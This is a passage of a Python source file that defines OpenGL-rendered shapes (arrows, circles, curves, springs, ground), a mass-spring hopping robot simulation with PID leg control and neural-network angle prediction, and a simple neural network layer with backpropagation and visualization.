Coordinate System\n self.rotMat = np.matlib.eye(2) # Rotation Matrix of Element\n\n self.camera = camera # Camera if define\n self.vtsC = np.matlib.zeros((2, num_vts)) # Vertexes represent in Camera Coordinate System\n\n # Set Center of Rotation represented in Object Coordinate System\n def setPivotO(self, x, y):\n self.pivotO[0] = x\n self.pivotO[1] = y\n\n # Rotate Element around P(x,y) in World Coordinate System\n def rotateE(self, theta, x=0, y=0):\n rm = rad2rm(theta)\n t = np.mat([[x], [y]])\n self.vtsW = rm * (self.vtsW - t) + t\n\n # Rotate Element around pivot\n def rotateO(self, theta):\n rm = rad2rm(theta)\n t = self.translation + self.pivotO\n self.vtsW = rm * (self.vtsW - t) + t\n\n # Move Element\n def translate(self, dx, dy):\n t = np.mat([[dx], [dy]])\n self.vtsW += t\n\n def setPosition(self, x=0.0, y=0.0):\n self.translation = np.mat([[x], [y]])\n self.vtsW = self.rotMat * (self.vtsO - self.pivotO) + self.translation\n\n def setDirectionRad(self, theta=0.0):\n self.rotMat = rad2rm(theta)\n self.vtsW = self.rotMat * (self.vtsO - self.pivotO) + self.translation\n\n def setDirectionDeg(self, theta=0.0):\n self.rotMat = rad2rm(np.deg2rad(theta))\n self.vtsW = self.rotMat * (self.vtsO - self.pivotO) + self.translation\n\n def setTranslation(self, x, y): # This function does not refresh position or orientation of element\n self.translation[0] = x\n self.translation[1] = y\n\n def setRotMat(self, r00, r01, r10, r11):\n self.rotMat[0, 0] = r00\n self.rotMat[0, 1] = r01\n self.rotMat[1, 0] = r10\n self.rotMat[1, 1] = r11\n\n def setRotMatRad(self, theta): # This function does not refresh position or orientation of element\n self.rotMat = rad2rm(theta)\n\n def setRotMatDeg(self, theta):\n self.rotMat = rad2rm(np.deg2rad(theta))\n\n def setRotMatSinCos(self, sin=0.0, cos=1.0):\n s = sin\n c = cos\n return np.mat([[c, -s], [s, c]])\n\n def refreshVtsW(self):\n self.vtsW = self.rotMat * (self.vtsO - self.pivotO) + self.translation\n\n def project2Camera(self):\n self.vtsC = self.camera.project(self.vtsW)\n\n\nclass Arrow(Element):\n def __init__(self, l=2.0, angle=0, x=0.0, y=0.0, h=1.0, s=1.0, v=1.0, camera=None):\n Element.__init__(self, num_vts=4, x=x, y=y, camera=camera)\n self.l = l\n self.rad = np.deg2rad(angle)\n self.start = np.mat([[x], [y]])\n self.end = np.mat([[x + l * np.cos(self.rad)], y + l * np.sin(self.rad)])\n self.wx = 0.2\n self.wy = 0.1\n self.setRotMatRad(self.rad)\n self.setTranslation(x, y)\n self.init_vtsO()\n self.refreshVtsW()\n self.hsv = [h, s, v]\n\n def init_vtsO(self):\n self.vtsO = np.mat([[0, self.l, self.l - self.wx, self.l - self.wx], [0, 0, self.wy, -self.wy]])\n\n def setLength(self, l):\n self.l = l\n self.end = np.mat([[self.start[0, 0] + l * np.cos(self.rad)], self.start[1, 0] + l * np.sin(self.rad)])\n self.init_vtsO()\n self.refreshVtsW()\n\n def draw(self):\n if self.camera == None:\n gl.glLineWidth(lw)\n rgb = mcol.hsv_to_rgb(self.hsv)\n gl.glColor4f(rgb[0], rgb[1], rgb[2], 0.5)\n gl.glBegin(gl.GL_LINES)\n gl.glVertex2f(self.vtsW[0, 0], self.vtsW[1, 0])\n gl.glVertex2f(self.vtsW[0, 1], self.vtsW[1, 1])\n gl.glEnd()\n gl.glBegin(gl.GL_LINE_STRIP)\n gl.glVertex2f(self.vtsW[0, -1], self.vtsW[1, -1])\n gl.glVertex2f(self.vtsW[0, -3], self.vtsW[1, -3])\n gl.glVertex2f(self.vtsW[0, -2], self.vtsW[1, -2])\n gl.glEnd()\n else:\n self.project2Camera()\n gl.glLineWidth(lw)\n rgb = mcol.hsv_to_rgb(self.hsv)\n gl.glColor4f(rgb[0], rgb[1], rgb[2], 0.5)\n gl.glBegin(gl.GL_LINES)\n gl.glVertex2f(self.vtsC[0, 0], self.vtsC[1, 0])\n gl.glVertex2f(self.vtsC[0, 1], self.vtsC[1, 1])\n gl.glEnd()\n gl.glBegin(gl.GL_LINE_STRIP)\n gl.glVertex2f(self.vtsC[0, -1], self.vtsC[1, -1])\n gl.glVertex2f(self.vtsC[0, -3], self.vtsC[1, -3])\n gl.glVertex2f(self.vtsC[0, -2], self.vtsC[1, -2])\n gl.glEnd()\n\n\nclass Circle:\n def __init__(self, x=0.0, y=0.0, radius=1.0, h=0.0, s=1., v=1., alpha=1., camera=None):\n self.x = x\n self.y = y\n self.radius = radius\n\n self.num_vts = 50\n self.vts = np.zeros((2, self.num_vts))\n self.camera = camera\n self.vtsC = np.zeros((2, self.num_vts))\n self.hsv = [h, s, v]\n self.alpha = alpha\n\n self.theta = 2 * np.pi / self.num_vts\n\n self.refreshVts()\n\n def refreshVts(self):\n for i in range(self.num_vts):\n self.vts[0, i] = self.x + self.radius * np.cos(i * self.theta)\n self.vts[1, i] = self.y + self.radius * np.sin(i * self.theta)\n\n def setPosition(self, x, y):\n self.x = x\n self.y = y\n self.refreshVts()\n\n def setRadius(self, r):\n self.radius = r\n self.refreshVts()\n\n def getPosition(self):\n return [self.x, self.y]\n\n def setColorH(self, h=0.):\n self.hsv[0] = h\n\n def setColor(self, color = np.ones(4)):\n self.hsv = color[:3]\n self.alpha = color[3]\n\n def setColorV(self, v):\n self.hsv[2] = v\n\n def draw(self):\n gl.glLineWidth(lw)\n rgb = mcol.hsv_to_rgb(self.hsv)\n gl.glBlendFunc(gl.GL_SRC_ALPHA, gl.GL_ONE_MINUS_SRC_ALPHA)\n gl.glEnable(gl.GL_BLEND)\n gl.glColor4f(rgb[0], rgb[1], rgb[2], self.alpha)\n gl.glBegin(gl.GL_LINE_LOOP)\n if self.camera == None:\n for i in range(self.num_vts):\n gl.glVertex2f(self.vts[0, i], self.vts[1, i])\n gl.glEnd()\n else:\n self.vtsC = self.camera.project(self.vts)\n for i in range(self.num_vts):\n gl.glVertex2f(self.vtsC[0, i], self.vtsC[1, i])\n gl.glEnd()\n\nclass Curve:\n def __init__(self, x0=0., y0=0., x1=1., y1=1., dx0=1.5, dy0=0., dx1=1.5, dy1=0.,\n offset0=0., offset1=0.,h=0., s=1., v=1., alpha=1., camera=None):\n self.params = [dx0 + dx1 + 2*x0 - 2*x1, 3*x1 - dx1 - 3*x0 - 2*dx0, dx0, x0,\n dy0 + dy1 + 2*y0 - 2*y1, 3*y1 - dy1 - 3*y0 - 2*dy0, dy0, y0]\n self.x0 = x0\n self.y0 = y0\n self.x1 = x1\n self.y1 = y1\n self.dx0 = dx0\n self.dy0 = dy0\n self.dx1 = dx1\n self.dy1 = dy1\n self.offset0 = offset0\n self.offset1 = offset1\n self.numt = 30\n self.startPoint = 0\n self.endPoint = self.numt\n self.t = np.linspace(0, 1, self.numt)\n self.vts = np.zeros((2, self.numt))\n self.vtsC = np.zeros((2, self.numt))\n self.hsv = [h, s, v]\n self.alpha = alpha\n self.camera = camera\n\n self.refreshVts()\n\n # Animation\n self.propagationVel = 2\n self.inputColor = [h, s, v, alpha]\n self.color = (np.ones((4, self.numt)).T*self.inputColor).T\n self.signals = np.zeros(self.numt)\n\n def setInputColorH(self, h):\n self.color[0, self.startPoint] = h\n\n def setInputColorS(self, s):\n self.color[1, self.startPoint] = s\n\n def setInputColorV(self, v):\n self.color[2, self.startPoint] = v\n\n\n def setInputColorAlpha(self, a):\n self.color[3, self.startPoint] = a\n\n\n def setInputColor(self, color=np.ones(4)):\n self.color[:, self.startPoint] = color\n\n def setPropagationVel(self, v):\n self.propagationVel = int(v)\n\n def setInputSignal(self, s):\n self.signals[self.startPoint] = s\n\n def get_outputSignal(self):\n return self.signals[self.endPoint-1]\n\n\n def refreshVts(self):\n for i in range(self.numt):\n t = self.t[i]\n tvec = np.array([t ** 3, t ** 2, t, 1.0])\n x = np.dot(self.params[0:4], tvec)\n y = np.dot(self.params[4:], tvec)\n self.vts[0, i] = x\n self.vts[1, i] = y\n if self.offset0 != 0. or self.offset1 != 0.:\n l0 = np.linalg.norm([x-self.x0, y-self.y0])\n l1 = np.linalg.norm([self.x1-x, self.y1-y])\n if self.offset0 != 0 and self.startPoint == 0 and l0 >= self.offset0:\n self.startPoint = i\n if self.offset1 != 0 and self.endPoint == self.numt and l1 <= self.offset1:\n self.endPoint = i\n\n def refreshParams(self):\n self.params = [self.dx0 + self.dx1 + 2 * self.x0 - 2 * self.x1, 3 * self.x1 - self.dx1 - 3 * self.x0 - 2 * self.dx0,\n self.dx0, self.x0,\n self.dy0 + self.dy1 + 2 * self.y0 - 2 * self.y1, 3 * self.y1 - self.dy1 - 3 * self.y0 - 2 * self.dy0,\n self.dy0, self.y0]\n def setPoint0(self, x0, y0):\n self.x0 = x0\n self.y0 = y0\n self.refreshParams()\n self.refreshVts()\n\n def setPoint1(self, x1, y1):\n self.x1 = x1\n self.y1 = y1\n self.refreshParams()\n self.refreshVts()\n\n def setDPoint0(self, dx0, dy0):\n self.dx0 = dx0\n self.dy0 = dy0\n self.refreshParams()\n self.refreshVts()\n\n def setDPoint1(self, dx1, dy1):\n self.dx1 = dx1\n self.dy1 = dy1\n self.refreshParams()\n self.refreshVts()\n\n def getPoint0(self):\n return [self.x0, self.y0]\n\n def getPoint1(self):\n return [self.x1, self.y1]\n\n def signal2colorV(self, s):\n v = (2. * sigmoid(s) - 1.) * .5\n return v\n\n def draw(self):\n gl.glLineWidth(1)\n rgb = mcol.hsv_to_rgb(self.hsv)\n gl.glBlendFunc(gl.GL_SRC_ALPHA, gl.GL_ONE_MINUS_SRC_ALPHA)\n gl.glEnable(gl.GL_BLEND)\n gl.glColor4f(rgb[0], rgb[1], rgb[2], self.alpha)\n gl.glBegin(gl.GL_LINE_STRIP)\n if self.camera == None:\n for i in range(self.endPoint-self.startPoint):\n gl.glVertex2f(self.vts[0, self.startPoint+i], self.vts[1, self.startPoint+i])\n gl.glEnd()\n else:\n self.vtsC = self.camera.project(self.vts)\n for i in range(self.endPoint-self.startPoint):\n id = self.endPoint-i-1\n self.signals[id] = self.signals[max(self.startPoint, id-self.propagationVel)]\n self.color[:, id] = self.color[:, max(self.startPoint, id-self.propagationVel)]\n col = mcol.hsv_to_rgb([self.color[0, id], self.color[1, id], self.signals[id]])#self.color[2, id] + self.signal2colorV(self.signals[id])])\n gl.glColor4f(col[0], col[1], col[2], self.color[3, id])\n gl.glVertex2f(self.vtsC[0, id], self.vtsC[1, id])\n gl.glEnd()\n\n\nclass Spring(Element):\n def __init__(self, length=1.0, angle=0.0, coils=8, width=0.2, k=1.0, x=0.0, y=0.0, h=1.0, s=0.0, v=1.0,\n camera=None):\n Element.__init__(self, num_vts=coils * 2 + 4, x=x, y=y, camera=camera)\n self.length = length # Length of the spring\n self.coils = coils # Number of coils of the spring\n self.width = width # Radius of the spring\n self.k = k\n self.rad = np.deg2rad(angle) # Direction of the spring\n self.start = np.mat([[x], [y]]) # Start point of the spring\n self.end = self.start + np.mat([[self.length * np.cos(self.rad)], [self.length * np.sin(self.rad)]])\n self.vec = self.end - self.start # The vector represent the spring\n self.init_vtsO()\n self.setRotMatRad(self.rad)\n self.refreshVtsW()\n self.hsv = [h, s, v] # Color of the spring\n\n def init_vtsO(self):\n self.vtsO[0, :] = np.linspace(0.0, self.length, self.num_vts, True)\n dl = self.length / (self.num_vts + 1)\n self.vtsO[0, 1] += 0.5 * dl\n self.vtsO[0, -2] -= 0.5 * dl\n self.vtsO[1, 2:-3:2] = 0.5 * self.width\n self.vtsO[1, 3:-2:2] = -0.5 * self.width\n\n def setLength(self, length):\n self.vtsO[0, :] = np.linspace(0.0, length, self.num_vts, True)\n dl = length / (self.num_vts + 1)\n self.vtsO[0, 1] += 0.5 * dl\n self.vtsO[0, -2] -= 0.5 * dl\n self.refreshVtsW()\n\n def resetLength(self):\n self.vtsO[0, :] = np.linspace(0.0, self.length, self.num_vts, True)\n dl = self.length / (self.num_vts + 1)\n self.vtsO[0, 1] += 0.5 * dl\n self.vtsO[0, -2] -= 0.5 * dl\n self.refreshVtsW()\n\n def setStart(self, x=0.0, y=0.0):\n self.start = np.mat([[x], [y]])\n self.vec = self.end - self.start\n self.length = np.linalg.norm(self.vec)\n self.rad = np.arctan2(self.vec[1, 0], self.vec[0, 0])\n self.setTranslation(x, y)\n self.setRotMatRad(self.rad)\n self.setLength(self.length)\n\n def setEnd(self, x=0.0, y=0.0):\n self.end = np.mat([[x], [y]])\n self.vec = self.end - self.start\n self.length = np.linalg.norm(self.vec)\n self.rad = np.arctan2(self.vec[1, 0], self.vec[0, 0])\n self.setRotMatRad(self.rad)\n self.setLength(self.length)\n\n def setStartEnd(self, x, y, x1, y1):\n self.start[0, 0] = x\n self.start[1, 0] = y\n self.end[0, 0] = x1\n self.end[1, 0] = y1\n self.vec = self.end - self.start\n self.length = np.linalg.norm(self.vec)\n self.rad = np.arctan2(self.vec[1, 0], self.vec[0, 0])\n self.setTranslation(x, y)\n self.setRotMatRad(self.rad)\n self.setLength(self.length)\n\n def draw(self):\n gl.glLineWidth(lw)\n rgb = mcol.hsv_to_rgb(self.hsv)\n gl.glColor4f(rgb[0], rgb[1], rgb[2], 0.5)\n gl.glBegin(gl.GL_LINE_STRIP)\n if self.camera == None:\n for i in range(self.num_vts):\n gl.glVertex2f(self.vtsW[0, i], self.vtsW[1, i])\n gl.glEnd()\n else:\n self.project2Camera()\n for i in range(self.num_vts):\n gl.glVertex2f(self.vtsC[0, i], self.vtsC[1, i])\n gl.glEnd()\n\n\ndef limit(x, lim):\n return max(min(x, lim), -lim)\n\n\n# Define ground function below\ndef ground(x):\n return 0\n\n\nclass Ground(Element):\n def __init__(self, height=0.0, l=20.0, w=0.1, x=0.0, y=0.0, h=0.0, s=0.0, v=1.0, alpha=0.5, camera=None):\n self.lnum = int((l - 2 * w) / w)\n Element.__init__(self, self.lnum * 2 + 2, x=x, y=y, camera=camera)\n self.height = height\n self.length = l\n self.width = w\n\n self.hsv = [h, s, v]\n self.alpha = alpha\n self.initVtsO()\n\n def initVtsO(self):\n self.vtsO[0, 0:self.lnum] = np.linspace(0, self.length - 2 * self.width, self.lnum) + 2 * self.width\n self.vtsO[0, self.lnum:2 * self.lnum] = np.linspace(0, self.length - 2 * self.width, self.lnum) + self.width\n self.vtsO[0, -1] = self.length\n self.vtsO[1, 0:self.lnum] -= self.width\n self.vtsO[0, :] -= self.length * 0.5\n self.vtsO[1, :] += self.height\n self.refreshVtsW()\n\n def draw(self):\n self.project2Camera()\n gl.glLineWidth(lw)\n rgb = mcol.hsv_to_rgb(self.hsv)\n gl.glColor4f(rgb[0], rgb[1], rgb[2], self.alpha)\n gl.glBegin(gl.GL_LINES)\n for i in range(self.lnum):\n gl.glVertex2f(self.vtsC[0, i], self.vtsC[1, i])\n gl.glVertex2f(self.vtsC[0, self.lnum + i], self.vtsC[1, self.lnum + i])\n gl.glVertex2f(self.vtsC[0, -2], self.vtsC[1, -2])\n gl.glVertex2f(self.vtsC[0, -1], self.vtsC[1, -1])\n gl.glEnd()\n\n\nclass MassSpring:\n def __init__(self, r=0.2, l=1.2, rad=-np.pi * 0.5, x=0.0, y=3., vx=0.0, vy=0.0, dt=0.01, camera=None):\n self.r = r # Radius of the head (m)\n self.l = l # Length of the leg (m)\n self.rad = rad # Direction of the leg (rad)\n self.m = 1.0 # Mass (kg)\n self.k = 1000.0 # Elastic coefficient of the spring\n self.i = 0.1 # Rotational inertia\n\n self.head = Circle(x, y, r, camera=camera)\n self.leg = Spring(l - r, self.rad, 6, 0.15 * self.l,\n x=x + r * np.cos(rad), y=y + r * np.sin(rad), camera=camera)\n # Neural network\n self.nn = NeuralNet(camera=camera)\n self.input_normalized = np.zeros((6,1))\n self.nn_vx_range = 10.0\n self.nn_vy_range = 10.\n self.nn_y_min = .2\n self.nn_y_max = 5.\n self.nn_rad_min = -np.pi * 5. / 6.\n self.nn_rad_max = -np.pi / 6.\n\n self.vx_dst = 0.\n self.vy_dst = 0.\n self.y_dst = 2.\n self.rad_dst = -np.pi*.5\n # There are 3 states of the mass-spring\n # state 0: the mass-spring is flying\n # state 1: the mass-spring is standing\n # state 2: the mass-spring is lying down\n # state 3: hold in sky\n self.state = 0\n self.x = x # Position x of the head\n self.y = y # Position y of the head\n self.x0 = x + l * np.cos(rad) # Position x of foot\n self.y0 = y + l * np.sin(rad) # Position y of foot\n self.vec = np.mat([self.x - self.x0, self.y - self.y0]).T # Vector that point from foot to head\n self.norm_vec = np.linalg.norm(self.vec)\n self.vx = vx # Velocity x of the head\n self.vy = vy # Velocity y of the head\n self.vrad = 0.0 # Angular velocity of the leg\n self.u = 0.0 # Control input of the leg direction\n self.dt = dt # Simulation time step of the mass-spring system\n self.f = np.mat([0, 0]).T # Force of the spring\n\n self.lim_vrad = 500.0 * np.pi # Limit of angular velocity\n\n self.dx = 0.0 # Change of x position of the head in a time step\n self.dy = 0.0 # Change of y position of the head in a time step\n self.dvx = 0.0 # Change of velocity x of the head in a time step\n self.dvy = 0.0 # Change of velocity y of the head in a time step\n self.drad = 0.0 # Change of angle of the leg\n self.dvrad = 0.0 # Change of angular velocity of the leg\n\n # Measurement data\n self.control = False\n self.err = 0.0 # Angular error\n self.lerr = 0.0 # Last time step angular error\n self.derr = 0.0 # Change of angular error\n self.ierr = 0.0 # Integration of angular error\n self.errv = 0.0 # Angular error\n self.lerrv = 0.0 # Last time step angular error\n self.derrv = 0.0 # Change of angular error\n # PID controller parameters\n self.kp = 10.0 # Proportionality coefficient\n self.ki = 0.0 # Integral coefficient\n self.kd = 10.0 # Differential coefficient\n self.kpv = 2.0 # Velocity proportionality coefficient\n self.kdv = 1.0 # Velocity differential coefficient\n self.ilim = 1000.0 # Limit of integral term\n self.ulim = 1000.0 # Limit of output\n\n self.pe = self.m * gravity * self.y # Potential energy\n self.ke = 0.5 * self.m * (self.vx ** 2 + self.vy ** 2) # Kinetic energy\n self.energy = self.pe + self.ke # Energy\n\n def init(self, x, y, rad, vx, vy):\n self.state = 0\n self.x = x\n self.y = max(self.l, y)\n self.rad = rad\n self.vx = vx\n self.vy = vy\n\n def construct_neural_network_from_file(self, name='mass_spring_neural_network.npz'):\n self.nn.construct_from_file(name)\n\n def network_cal_rad(self, vx=0., vy=0., y=0., vx_dst=0., vy_dst=0., y_dst=0.):\n if self.nn.dimIn == 4:\n self.input_normalized[0, 0] = remap(vx, -self.nn_vx_range, self.nn_vx_range)\n self.input_normalized[1, 0] = remap(y, -self.nn_y_min, self.nn_y_max)\n self.input_normalized[2, 0] = remap(vx_dst, -self.nn_vx_range, self.nn_vx_range)\n self.input_normalized[3, 0] = y_dst#remap(y_dst, -self.nn_y_min, self.nn_y_max)\n self.rad_dst = remap(self.nn.cal_output(self.input_normalized[:4])[0, 0], 0., 1., self.nn_rad_min,\n self.nn_rad_max)\n\n elif self.nn.dimIn == 5:\n self.input_normalized[0, 0] = remap(vx, -self.nn_vx_range, self.nn_vx_range)\n self.input_normalized[1, 0] = remap(vy, -self.nn_vy_range, self.nn_vy_range)\n self.input_normalized[2, 0] = remap(y, self.nn_y_min, self.nn_y_max)\n self.input_normalized[3, 0] = remap(vx_dst, -self.nn_vx_range, self.nn_vx_range)\n self.rad_dst = remap(self.nn.cal_output(self.input_normalized[:5])[0, 0], 0., 1., self.nn_rad_min,\n self.nn_rad_max)\n\n elif self.nn.dimIn == 6:\n self.input_normalized[0, 0] = remap(vx, -self.nn_vx_range, self.nn_vx_range)\n self.input_normalized[1, 0] = remap(vy, -self.nn_vy_range, self.nn_vy_range)\n self.input_normalized[2, 0] = remap(y, self.nn_y_min, self.nn_y_max)\n self.input_normalized[3, 0] = remap(vx_dst, -self.nn_vx_range, self.nn_vx_range)\n self.input_normalized[4, 0] = remap(vy_dst, -self.nn_vy_range, self.nn_vy_range)\n self.input_normalized[5, 0] = remap(y_dst, self.nn_y_min, self.nn_y_max)\n self.rad_dst = remap(self.nn.cal_output(self.input_normalized)[0, 0], 0., 1., self.nn_rad_min, self.nn_rad_max)\n\n def set_jump_dst(self, vx_dst=0., vy_dst=0., y_dst=.8):\n self.vx_dst = vx_dst\n self.vy_dst = vy_dst\n self.y_dst = y_dst\n\n def adjustVelocity(self):\n self.pe = self.m * gravity * self.y\n self.ke = self.energy - self.pe\n adj_vnorm = np.sqrt(2 * self.ke / self.m)\n vnorm = np.sqrt(self.vx ** 2 + self.vy ** 2)\n k = adj_vnorm / vnorm\n self.vx *= k\n self.vy *= k\n\n def updateState(self):\n # print(self.state)\n # When the mass-spring is flying\n if self.state == 0:\n self.dx = self.vx * self.dt\n self.dy = self.vy * self.dt\n self.dvx = 0\n self.dvy = -gravity * self.dt\n self.drad = self.vrad * self.dt\n self.dvrad = self.u / self.i * self.dt\n\n self.x += self.dx\n self.y += self.dy\n self.vx += self.dvx\n self.vy += self.dvy\n self.rad += self.drad\n self.vrad += self.dvrad\n if self.rad > np.pi:\n self.rad -= 2.0 * np.pi\n if self.rad < - np.pi:\n self.rad += 2.0 * np.pi\n self.vrad += self.dvrad\n self.vrad = limit(self.vrad, self.lim_vrad)\n self.x0 = self.x + self.l * np.cos(self.rad)\n self.y0 = self.y + self.l * np.sin(self.rad)\n self.vec = np.mat([self.x - self.x0, self.y - self.y0]).T\n\n # Condition of changing state\n # flying -> stop\n if ground(self.x) >= self.y - self.r:\n self.state = 2\n self.y = self.r\n\n # flying -> standing\n if ground(self.x0) >= self.y0:\n self.state = 1\n self.y0 = 0\n self.norm_vec = np.linalg.norm(self.vec)\n self.f = self.vec * self.k * (self.l / self.norm_vec - 1.0)\n self.adjustVelocity()\n # When the mass-spring is standing\n if self.state == 1:\n self.dx = self.vx * self.dt\n self.dy = self.vy * self.dt\n self.dvx = self.f[0, 0] / self.m * self.dt\n self.dvy = (self.f[1, 0] / self.m - gravity) * self.dt\n\n self.x += self.dx\n self.y += self.dy\n self.vx += self.dvx\n self.vy += self.dvy\n self.vec = np.mat([self.x - self.x0, self.y - self.y0]).T\n self.norm_vec = np.linalg.norm(self.vec)\n self.rad = np.arctan2(-self.vec[1, 0], -self.vec[0, 0])\n self.f = self.vec * self.k * (self.l / self.norm_vec - 1.0)\n\n # Condition of changing state\n # standing -> flying\n if self.norm_vec >= self.l:\n self.state = 0\n self.y0 = 0\n self.adjustVelocity()\n if self.control:\n if self.nn.dimIn == 4:\n delta_y = .5*self.vy**2/gravity\n y_top = delta_y+self.y\n self.network_cal_rad(vx=self.vx, y=y_top,\n vx_dst=self.vx_dst, y_dst=self.y_dst)\n elif self.nn.dimIn == 6:\n self.network_cal_rad(vx=self.vx, vy=self.vy, y=self.y,\n vx_dst=self.vx_dst, vy_dst=self.vy_dst, y_dst=self.y_dst)\n # print('vx: '+str(round(self.vx, 3)))\n\n # standing -> stop\n if ground(self.x) >= self.y - self.r:\n self.state = 2\n self.y = self.r\n\n if self.state == 3:\n self.drad = self.vrad * self.dt\n self.dvrad = self.u / self.i * self.dt\n self.rad += self.drad\n self.vrad += self.dvrad\n self.x0 = self.x + self.l * np.cos(self.rad)\n self.y0 = self.y + self.l * np.sin(self.rad)\n\n def hold(self):\n self.state = 3\n\n def updateInput(self, dstRad):\n if not self.control:\n self.u = 0\n else:\n self.err = dstRad - self.rad\n while self.err > np.pi:\n self.err -= np.pi * 2.0\n while self.err < -np.pi:\n self.err += np.pi * 2.0\n self.ierr += self.err\n self.ierr = limit(self.ierr, self.ilim)\n self.derr = self.err - self.lerr\n self.lerr = self.err\n\n dstv = self.kp * self.err + self.ki * self.ierr + self.kd * self.derr\n self.errv = dstv - self.vrad\n self.derrv = self.errv - self.lerrv\n self.lerrv = self.errv\n self.u = self.kpv * self.errv + self.kdv * self.derrv\n self.u = limit(self.u, self.ulim)\n\n def update(self, dt=0.01, control=True):\n self.control = control\n self.dt = dt\n if control:\n self.updateInput(self.rad_dst)\n self.updateState()\n\n def draw(self):\n self.head.setPosition(self.x, self.y)\n self.leg.setStartEnd(self.x + self.r * np.cos(self.rad), self.y + self.r * np.sin(self.rad),\n self.x0, self.y0)\n # self.leg.setStart(self.x, self.y)\n # self.leg.setEnd(self.x0, self.y0)\n self.head.draw()\n self.leg.draw()\n\n\n# Neural Network\ndef sigmoid(a):\n return 1.0 / (1.0 + np.exp(-a))\n\n\ndef dsigmoid(s):\n return s * (1 - s)\n\n\ndef relu(a):\n k = .3\n kk = 0.01 * k\n a[a >= 0] *= k\n a[a < 0] *= kk\n return a\n\n\ndef drelu(r):\n k = .3\n kk = 0.01 * k\n r[r >= 0] = k\n r[r < 0] = kk\n return r\n\ndef map2color(x, h0=.59, h1=.03):\n k = 10.\n s1 = sigmoid(k*x)\n s0 = 1. - s1\n rad0 = h0*twoPi\n rad1 = h1*twoPi\n vec0 = np.array([np.cos(rad0), np.sin(rad0)])\n vec1 = np.array([np.cos(rad1), np.sin(rad1)])\n vec = s0*vec0 + s1*vec1\n h = (np.arctan2(vec[1], vec[0]))/twoPi\n if h < 0:\n h += 1\n s = np.linalg.norm(vec)\n return [h, s, .75*s, 1.]\n\n\ntwoPi = 2.*np.pi\n# z = w*x + b\n# y = sigmoid(z)\nclass Layer:\n def __init__(self, dimX=3, dimY=2, actFunc=1):\n self.dimX = dimX\n self.dimY = dimY\n self.weightRange = 6.\n self.biasRange = 3.\n self.weight = self.weightRange * (np.random.random((self.dimY, self.dimX)) - 0.5)\n self.bias = self.biasRange*(np.random.random((self.dimY, 1)) - 0.5)\n self.actFunc = actFunc # Activation function: 1:sigmoid 2:relu\n\n self.x = np.zeros((self.dimX, 1))\n self.y = np.zeros((self.dimY, 1))\n self.djz = np.zeros((self.dimY, 1))\n self.djw = np.zeros((self.dimY, self.dimX))\n self.djb = np.zeros((self.dimY, 1))\n self.djy = np.zeros((self.dimY, 1))\n self.djx = np.zeros((self.dimX, 1))\n\n # Graph\n self.nodes = np.zeros(self.dimY, dtype=Circle)\n self.edges = np.zeros((self.dimY, self.dimX), dtype=Curve)\n # Color map\n h0 = 0.59\n h1 = 0.03\n self.k = 1.\n rad0 = h0*twoPi\n rad1 = h1*twoPi\n self.vec0 = np.array([np.cos(rad0), np.sin(rad0)])\n self.vec1 = np.array([np.cos(rad1), np.sin(rad1)])\n\n self.nodesColor = np.ones((self.dimY, 4))\n\n def random_init_parameters(self):\n self.weight = self.weightRange * (np.random.random((self.dimY, self.dimX)) - 0.5)\n self.bias = self.biasRange * (np.random.random((self.dimY, 1)) - 0.5)\n\n def get_parameter(self):\n return [self.weight, self.bias, self.actFunc]\n\n def set_parameter(self, parameter):\n self.weight = parameter[0]\n self.bias = parameter[1]\n self.actFunc = parameter[2]\n\n def map2nodesColor(self, v):\n s1 = v#sigmoid(self.k * v)\n s0 = 1 - s1\n vecs = s0*self.vec0 + s1*self.vec1\n h = np.arctan2(vecs[:, 1], vecs[:, 0])/twoPi\n h[h < 0.] += 1.\n s = np.linalg.norm(vecs, axis=1)\n self.nodesColor[:, 0] = h\n self.nodesColor[:, 1] = s\n self.nodesColor[:, 2] = s\n # self.nodesColor[:, 3] = 1.\n\n def setActFunc(self, actFunc):\n self.actFunc = actFunc\n\n def setActFuncToSigmoid(self):\n self.actFunc = 1\n\n def setActFuncToRelu(self):\n self.actFunc = 2\n\n def setDimX(self, dim):\n self.dimX = dim\n self.weight = np.random.random((self.dimY, self.dimX))\n\n def setDimY(self, dim):\n self.dimY = dim\n self.weight = np.random.random((self.dimY, self.dimX))\n self.bias = np.random.random((self.dimY, 1))\n\n def cal_output(self, x):\n self.x = x\n if self.actFunc == 1: # Sigmoid activation function\n self.y = self.cal_outputSigmoid(self.x)\n elif self.actFunc == 2: # Relu actiation function\n self.y = self.cal_outputRelu(self.x)\n return self.y\n\n def cal_outputSigmoid(self, x):\n z = np.dot(self.weight, x) + self.bias\n return sigmoid(z)\n\n def cal_outputRelu(self, x):\n return relu(np.dot(self.weight, x) + self.bias)\n\n def backpropagation(self, djy, alpha):\n n = self.djy.shape[1]\n self.djy = djy\n if self.actFunc == 1: # Sigmoid activation function\n self.djz = self.djy * dsigmoid(self.y)\n elif self.actFunc == 2: # Relu activation function\n self.djz = self.djy * drelu(self.y)\n self.djw = np.dot(self.djz, self.x.T) / n\n self.djb = (np.sum(self.djz, 1) / n).reshape((self.dimY, 1))\n self.djx = np.dot(self.weight.T, self.djz)\n\n self.weight -= alpha * self.djw\n self.bias -= alpha * self.djb\n return self.djx\n\n def set_edge_input(self, x):\n for i in range(self.dimY):\n for j in range(self.dimX):\n self.edges[i, j].setInputSignal(x[j])\n\n def get_output(self):\n return self.y\n\n def init_graph(self, x=0., y=0., r=.2, camera=None):\n b = 6. * r\n d = 3. * r\n offsetX = .5 * b\n offsetYNode = .5*(self.dimY-1)*d\n offsetYedge = .5*(self.dimX-1)*d\n self.map2nodesColor(self.bias)\n for i in range(self.dimY):\n self.nodes[i] = Circle(x=x+offsetX, y=y+d*i-offsetYNode, radius=r,\n h=self.nodesColor[i, 0], s=self.nodesColor[i, 1], v=self.nodesColor[i, 2],\n alpha=self.nodesColor[i, 3], camera=camera)\n for j in range(self.dimX):\n colorEdge = map2color(self.weight[i, j])\n self.edges[i, j] = Curve(x0=x-b+offsetX, y0=y+j*d-offsetYedge, x1=x+offsetX, y1=y+d*i-offsetYNode,\n offset0=r, offset1=r,\n h=colorEdge[0], s=colorEdge[1], v=colorEdge[2],\n alpha=colorEdge[3], camera=camera)\n def draw(self):\n x = np.zeros((self.dimX, 1))\n for j in range(self.dimX):\n x[j, 0] = self.edges[0, j].get_outputSignal()\n y = self.cal_output(x)\n self.map2nodesColor(y)\n for i in range(self.dimY):\n self.nodes[i].setColor(self.nodesColor[i, :])\n self.nodes[i].draw()\n for j in range(self.dimX):\n self.edges[i, j].draw()\n\n\n# Neural networks class\n# dimIn: dimension of input\n# dimOut: dimension of output\n# ls: number of neures in every hidden layer\nclass 